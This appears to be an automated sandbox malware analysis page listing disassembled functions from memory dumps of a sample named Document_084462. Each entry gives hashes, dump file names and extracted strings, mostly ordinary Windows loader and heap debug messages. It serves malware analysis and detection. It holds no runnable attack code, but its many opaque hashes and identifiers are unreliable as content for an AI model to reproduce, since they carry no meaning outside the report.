                                                                              Function 37B2FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                              • API String ID: 3446177414-4227709934
                                                                              • Opcode ID: d453bee3950821652cae182b858a695ba079ab2a81c9b0ba8d415721fdab34a2
                                                                              • Instruction ID: ef44f00fc05b07b6571df3a7351b33b1af996a562a62fa785ecea023c451c857
                                                                              • Opcode Fuzzy Hash: d453bee3950821652cae182b858a695ba079ab2a81c9b0ba8d415721fdab34a2
                                                                              • Instruction Fuzzy Hash: 59416EB5A02219EFEB01DF94C885AEEBBB5FF49354F104029EC08B7340D735AA11EB90
                                                                              Function 37AB9046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$@$@wMw
                                                                              • API String ID: 3446177414-1508499165
                                                                              • Opcode ID: 2bb79d77efe2236ee972141b4b9f19747910f6887dd3731512ffa288acaabbc3
                                                                              • Instruction ID: 784da03ae0c564f4ee5f4c16197703977491cf85fd8d8b01ce23e1363c87168e
                                                                              • Opcode Fuzzy Hash: 2bb79d77efe2236ee972141b4b9f19747910f6887dd3731512ffa288acaabbc3
                                                                              • Instruction Fuzzy Hash: F5812CB1D00269DBEB31CB54CD45BEEB7B8AB48750F0041EAEA19B7250D7349E85CFA1
                                                                              Function 37B5F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                              • API String ID: 3446177414-3492000579
                                                                              • Opcode ID: 0e1a5408135f290ae756392938c52816b87e8242719334817058e06e05ad36bd
                                                                              • Instruction ID: fca7f0991a72741d07ea5cfcaf0d4e48e85e9680da9145f952933a8f6622197b
                                                                              • Opcode Fuzzy Hash: 0e1a5408135f290ae756392938c52816b87e8242719334817058e06e05ad36bd
                                                                              • Instruction Fuzzy Hash: 0D7145B5901695EFEB01DFA8D491AADFBF2FF48320F048059E851AB251CB39A941CF52
                                                                              Function 37AA6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • LdrpLoadShimEngine, xrefs: 37B0984A, 37B0988B
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B09854, 37B09895
                                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37B09843
                                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37B09885
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-3589223738
                                                                              • Opcode ID: e14f123c42c37f939ebd38e8fdebbc606244dde12dde69a43c47783ed708322b
                                                                              • Instruction ID: 5fd53c5ee8f5d0500d48815792d3250b2eaf9e10b1a410254a1569d142c91001
                                                                              • Opcode Fuzzy Hash: e14f123c42c37f939ebd38e8fdebbc606244dde12dde69a43c47783ed708322b
                                                                              • Instruction Fuzzy Hash: C85124B5A013589FEB48EBA8CC5AFED7BB5AB44354F040125EC60BB285DB389C45CB52
                                                                              Function 37ADDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                              • API String ID: 3446177414-3224558752
                                                                              • Opcode ID: 2a62f5f428b69dee1ca8fe555704e664a5de277bbb25aa11d1c232cc0edd5656
                                                                              • Instruction ID: 76f739c0c86d681d1ea1b7e9598fe06b971691de075f6bf0046d67ba05116caa
                                                                              • Opcode Fuzzy Hash: 2a62f5f428b69dee1ca8fe555704e664a5de277bbb25aa11d1c232cc0edd5656
                                                                              • Instruction Fuzzy Hash: 79414674601750EFE301CF64C994F5AB7B4FF40360F008569EC2597392CB38A980CB92
                                                                              Function 37B5ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 37B5EDE3
                                                                              • HEAP: , xrefs: 37B5ECDD
                                                                              • ---------------------------------------, xrefs: 37B5EDF9
                                                                              • Entry Heap Size , xrefs: 37B5EDED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                              • API String ID: 3446177414-1102453626
                                                                              • Opcode ID: 985a1321a925db94a2cc051c058c6e35e0896993c1de0c7169eb219d873ef84d
                                                                              • Instruction ID: d3f7d1cf7b801c6f931a49fdfd0ffaa97949229933231f2413ca25292b356241
                                                                              • Opcode Fuzzy Hash: 985a1321a925db94a2cc051c058c6e35e0896993c1de0c7169eb219d873ef84d
                                                                              • Instruction Fuzzy Hash: F741BEB9A01221DFE784EF18C58691ABBF5FF4937472980A9D404AF251DB39ED02CB84
                                                                              Function 37ADDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                              • API String ID: 3446177414-1222099010
                                                                              • Opcode ID: 08348807e2b4af37a08709ea7d9e2a06914577f0820e47c0720a4b4f8cce0f27
                                                                              • Instruction ID: 73fd66d340d818ee02fec02a6da1ebe9587696c823a1b5503d488f06bfccb07c
                                                                              • Opcode Fuzzy Hash: 08348807e2b4af37a08709ea7d9e2a06914577f0820e47c0720a4b4f8cce0f27
                                                                              • Instruction Fuzzy Hash: EC314475112794EFF712CB68C829F597BF8FB01664F004496EC2157662CB6CAA44CB12
                                                                              Function 37AE4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • LdrpFindDllActivationContext, xrefs: 37B23440, 37B2346C
                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37B23439
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 37B2344A, 37B23476
                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 37B23466
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 3446177414-3779518884
                                                                              • Opcode ID: af6c6c83f4e17fa99d3205f6bf7e65bf4a1fd580081ef6e132475893ac4953b3
                                                                              • Instruction ID: 5cd822be88041167a792d10f8f15bb0fb35ebc01395a5ff28952cf02df42dbb9
                                                                              • Opcode Fuzzy Hash: af6c6c83f4e17fa99d3205f6bf7e65bf4a1fd580081ef6e132475893ac4953b3
                                                                              • Instruction Fuzzy Hash: 7B3125B6A01355AFFB119B058849B66B2BCFBC53B4F428066FD2467940E764ACC0C692
                                                                              Function 37AD237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • apphelp.dll, xrefs: 37AD2382
                                                                              • LdrpDynamicShimModule, xrefs: 37B1A7A5
                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 37B1A79F
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B1A7AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-176724104
                                                                              • Opcode ID: f997fa201dc9cc1cf884801bdb9865ebdb6d469d211ff7ef94c14c374f9ec8eb
                                                                              • Instruction ID: b8e0cf0e21868c0550d5ae95817eed6f25e052ddc49bb63a086e8c4680566c73
                                                                              • Opcode Fuzzy Hash: f997fa201dc9cc1cf884801bdb9865ebdb6d469d211ff7ef94c14c374f9ec8eb
                                                                              • Instruction Fuzzy Hash: 6D3116B5A41310EBF754AF59C8CAFA977B8FB84754F144069EC10B7280EB7CA942CB61
                                                                              Function 37AAF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 3446177414-3610490719
                                                                              • Opcode ID: 6f7081e0c68f14826c4e302c9cc76fc6c28076c80224238761fd59768777acd2
                                                                              • Instruction ID: 4aa86371929ef2470b874d279226ec8521a8c7ee5ab1d12da71cb7b91159312e
                                                                              • Opcode Fuzzy Hash: 6f7081e0c68f14826c4e302c9cc76fc6c28076c80224238761fd59768777acd2
                                                                              • Instruction Fuzzy Hash: 0C91DFB5204751EFE399DB24C984F6EBBB5FF84650F000559FD609B281EB38E845CB92
                                                                              Function 37AD0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B19F2E
                                                                              • LdrpCheckModule, xrefs: 37B19F24
                                                                              • Failed to allocated memory for shimmed module list, xrefs: 37B19F1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-161242083
                                                                              • Opcode ID: ded5df6be24d340cb8be7ecec82adac088ea1bdf758f934bc919f02f07943296
                                                                              • Instruction ID: 07157850cdd90677aece5a1b7f863843fdb65ed1fb0bacea0cf700bc69f605b4
                                                                              • Opcode Fuzzy Hash: ded5df6be24d340cb8be7ecec82adac088ea1bdf758f934bc919f02f07943296
                                                                              • Instruction Fuzzy Hash: F871F2B5A04249DFEB04DF68C995BAEB7F4EB84318F14406DEC22E7240E738AD42DB51
                                                                              Function 37AEC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 37B280E9
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 37B280F3
                                                                              • Failed to reallocate the system dirs string !, xrefs: 37B280E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-1783798831
                                                                              • Opcode ID: 059922b1fd225835fa41d59f56ae1d6bce14d800ba86200407b78d0e64da0471
                                                                              • Instruction ID: 74be9f121f9ca477afdecd8db142200f73e1ec74efeab411670ac43c42583ced
                                                                              • Opcode Fuzzy Hash: 059922b1fd225835fa41d59f56ae1d6bce14d800ba86200407b78d0e64da0471
                                                                              • Instruction Fuzzy Hash: 9241B4B5546300ABE751EF68CD42B5B77F8EB84650F01582AFC68E7690EA3CD8019B93
                                                                              Function 37B343D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 37B34519
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37B34508
                                                                              • LdrpCheckRedirection, xrefs: 37B3450F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 3446177414-3154609507
                                                                              • Opcode ID: a6788bc236804865d9799fae3dfe0f126addbb5458790de2b6acb81c1fcf08dd
                                                                              • Instruction ID: 853ea56ff3cde307c143d96f71b5d31e0c9ed02d6f14301e2503b852e2f41424
                                                                              • Opcode Fuzzy Hash: a6788bc236804865d9799fae3dfe0f126addbb5458790de2b6acb81c1fcf08dd
                                                                              • Instruction Fuzzy Hash: DE419FB6606321ABFB11CF589940A3677F4EF48660F0506AAEC9897256DB34EC80CB91
                                                                              Function 37B35B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: Wow64 Emulation Layer
                                                                              • API String ID: 3446177414-921169906
                                                                              • Opcode ID: d853a041e3c8e978130aa9117f44f0e3a3263950419e255055a9a075e9efef2a
                                                                              • Instruction ID: 821814b41610a8a5831ca2129332d0a49bdd10a7a4a840b70bae683ef625710d
                                                                              • Opcode Fuzzy Hash: d853a041e3c8e978130aa9117f44f0e3a3263950419e255055a9a075e9efef2a
                                                                              • Instruction Fuzzy Hash: 2321D8B694111EBFAB02ABA0CD88DFF7BBDEF45699B440054FE15A2100E634EE11DB71
                                                                              Function 37ADEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a39c6d134d8a1741a61ce6da437edb4c033fd8a6c25502bcea937df06de59d3e
                                                                              • Instruction ID: 1e49a322c1f20e950b11a885b3c02b113fc11f86d448641dbf6ada8d14adfbc4
                                                                              • Opcode Fuzzy Hash: a39c6d134d8a1741a61ce6da437edb4c033fd8a6c25502bcea937df06de59d3e
                                                                              • Instruction Fuzzy Hash: 60E104B5D00718DFDB25CFA9C9A0A9EBBF1FF88314F10452AE965A7261DB34A941CF10
                                                                              Function 00123A70 Relevance: 6.3, Strings: 5, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13274647098.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_120000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *'2$!</6$#jf$$4$jf"#
                                                                              • API String ID: 0-3454608543
                                                                              • Opcode ID: e94a3d83ea83a161a1fbd5a7129fce51fc4a760f4d21ba55dd701e68776cf658
                                                                              • Instruction ID: a352783a9aef220ce8a89b214ae4d3e176e508074ab68109b807fd485499baee
                                                                              • Opcode Fuzzy Hash: e94a3d83ea83a161a1fbd5a7129fce51fc4a760f4d21ba55dd701e68776cf658
                                                                              • Instruction Fuzzy Hash: F1F0B47002C7444FC708AF14D84455677E1FF99308F401B9CE88ADB142D77DC6458786
                                                                              Function 37B2EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 37cae22cacb7d4eeef1941edd4d2eae13dbc0f4fd454720032bfc87b6ab3e2fa
                                                                              • Instruction ID: bf40e341b0e45258339e59611a16cb09a1cd8bafa9b2e5e6667cc4fd39dfe778
                                                                              • Opcode Fuzzy Hash: 37cae22cacb7d4eeef1941edd4d2eae13dbc0f4fd454720032bfc87b6ab3e2fa
                                                                              • Instruction Fuzzy Hash: B57136B1E02229DFEF01CFA5C889BEDBBB5FF48350F544029E909AB250E734A905DB55
                                                                              Function 37B8A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 429511a3c02fcb700d8c035b3fe569a6a4301599256f0ed249d2a85e8f3e74f0
                                                                              • Instruction ID: f8c11a8a36ecacb78e00bb43960bfce1a6dd42a172b08529164ed8687bd20706
                                                                              • Opcode Fuzzy Hash: 429511a3c02fcb700d8c035b3fe569a6a4301599256f0ed249d2a85e8f3e74f0
                                                                              • Instruction Fuzzy Hash: 0F5137B4711662EFFB08DE28C8D1A29B7F2FB8A360B144169D516D7750DB75EC41CB80
                                                                              Function 37B2EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: cf30207f978940724d3d1d49e992f908fd4df31fc38f059e461eb10d9f97c796
                                                                              • Instruction ID: 99b3b0686c2ee4d3afb5539e6723da095b84a9b18d92fa9bdedd2734e7f7e24d
                                                                              • Opcode Fuzzy Hash: cf30207f978940724d3d1d49e992f908fd4df31fc38f059e461eb10d9f97c796
                                                                              • Instruction Fuzzy Hash: 7C5102B5E02218EFEF04CF96D845ADDBBB1BF48351F14802AE809BB250E735A941DF54
                                                                              Function 37AE7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                              • String ID:
                                                                              • API String ID: 4281723722-0
                                                                              • Opcode ID: 7b3ad2bdf00a679c09bbbd953a9a35bc4bda33a6a7d91496ad56940262186ae3
                                                                              • Instruction ID: ab07ce071bb524f6b30a705139cf1b15c2a175b364f194b814622ac074c5cabb
                                                                              • Opcode Fuzzy Hash: 7b3ad2bdf00a679c09bbbd953a9a35bc4bda33a6a7d91496ad56940262186ae3
                                                                              • Instruction Fuzzy Hash: C03147B5E52228EFDF01DFA8D84AA9DBBF0FB48320F10416AE911B7280DB385901DF50
                                                                              Function 37AB58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: ca2428251db430b26a1f88a1cbc77081b54db9a0e90c0c757c82814734e15961
                                                                              • Instruction ID: d6a980ed23537fd790b0cc91767f49f24b93034f763bf69a33f8a84e8b9fa234
                                                                              • Opcode Fuzzy Hash: ca2428251db430b26a1f88a1cbc77081b54db9a0e90c0c757c82814734e15961
